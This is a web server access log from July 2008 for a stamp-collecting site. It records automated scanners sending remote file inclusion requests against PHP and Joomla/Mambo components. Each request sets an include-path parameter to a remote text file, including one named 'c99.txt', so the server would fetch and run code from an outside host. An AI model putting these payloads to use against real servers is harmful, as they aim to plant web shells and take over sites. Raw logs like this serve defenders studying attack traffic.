69.72.153.58 - - [20/Jul/2008:18:01:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
69.72.153.58 - - [20/Jul/2008:18:01:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:18:01:33 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:18:01:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:03:50 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:03:50 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:03:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
211.60.155.3 - - [20/Jul/2008:18:04:04 -0700] "GET /logs//index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
211.60.155.3 - - [20/Jul/2008:18:04:04 -0700] "GET //index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:05:12 -0700] "GET /logs/access_080602.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.26.212.89 - - [20/Jul/2008:18:05:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
87.10.64.239 - - [20/Jul/2008:18:07:11 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
87.10.64.239 - - [20/Jul/2008:18:07:12 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
87.10.64.239 - - [20/Jul/2008:18:07:12 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
211.60.155.3 - - [20/Jul/2008:18:07:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
211.60.155.3 - - [20/Jul/2008:18:07:17 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:07:46 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:07:47 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:10:32 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:18:11:47 -0700] "GET /afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:18:11:47 -0700] "GET /logs/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:12:20 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:13:00 -0700] "GET /logs/access_080602.log//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:13:01 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:13:01 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
87.10.64.239 - - [20/Jul/2008:18:13:44 -0700] "GET /logs/access_080616.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:14:00 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:18:18:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.5.163.212 - - [20/Jul/2008:18:19:05 -0700] "GET /components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
195.5.163.212 - - [20/Jul/2008:18:19:06 -0700] "GET /logs/components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:19:29 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:19:29 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:19:30 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:20:04 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:20:32 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:20:48 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:20:49 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:20:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:23:05 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:23:05 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:23:05 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:23:34 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:23:34 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:23:34 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:24:01 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:24:25 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:24:29 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:18:24:59 -0700] "GET /logs/access_080526.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:24:59 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:25:00 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:25:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:25:01 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:25:01 -0700] "GET //include/bbs.lib.inc.php?site_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:25:01 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:18:25:02 -0700] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:25:56 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:13 -0700] "GET /logs/access_080519.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:13 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:18 -0700] "GET /logs/access_080519.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:34 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:27:37 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:18 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:21 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:48 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:49 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:49 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:52 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:52 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:28:53 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:29:13 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:29:23 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:18:29:26 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:31:07 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:31:41 -0700] "GET /logs/access.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:31:49 -0700] "GET /logs/access.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:31:50 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.28.190 - - [20/Jul/2008:18:31:52 -0700] "GET /logs/access_080512.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.15.70.35 - - [20/Jul/2008:18:31:53 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
59.188.5.164 - - [20/Jul/2008:18:32:24 -0700] "GET /logs/access_080512.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
212.14.233.59 - - [20/Jul/2008:18:32:52 -0700] "GET //include.php?path[docroot]=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.14.233.59 - - [20/Jul/2008:18:32:52 -0700] "GET /logs//include.php?path[docroot]=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.14.233.59 - - [20/Jul/2008:18:32:53 -0700] "GET /logs/access_080609.log//include.php?path[docroot]=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.14.233.59 - - [20/Jul/2008:18:32:55 -0700] "GET /logs/access.log//include.php?path[docroot]=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
79.98.23.1 - - [20/Jul/2008:18:33:11 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:18:33:18 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:18:33:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:18:33:19 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:18:34:11 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:34:47 -0700] "GET /logs/access_080609.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:34:47 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:34:48 -0700] "GET /logs//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 8665 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:35:10 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "www.mathstamps.com"
201.26.212.89 - - [20/Jul/2008:18:35:56 -0700] "GET /logs/access_080602.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.26.212.89 - - [20/Jul/2008:18:35:57 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.26.212.89 - - [20/Jul/2008:18:36:33 -0700] "GET /logs/access_080609.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:41:06 -0700] "GET /logs/access_080609.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:41:07 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:41:07 -0700] "GET /logs//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 8649 "-" "libwww-perl/5.53" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:41:45 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:41:46 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:42:31 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:42:31 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
79.98.23.1 - - [20/Jul/2008:18:43:37 -0700] "GET /logs/access_080609.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
79.98.23.1 - - [20/Jul/2008:18:43:43 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
79.98.23.1 - - [20/Jul/2008:18:43:46 -0700] "GET /logs//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 8665 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.55.52.194 - - [20/Jul/2008:18:44:23 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.52.194 - - [20/Jul/2008:18:44:24 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.52.194 - - [20/Jul/2008:18:44:24 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
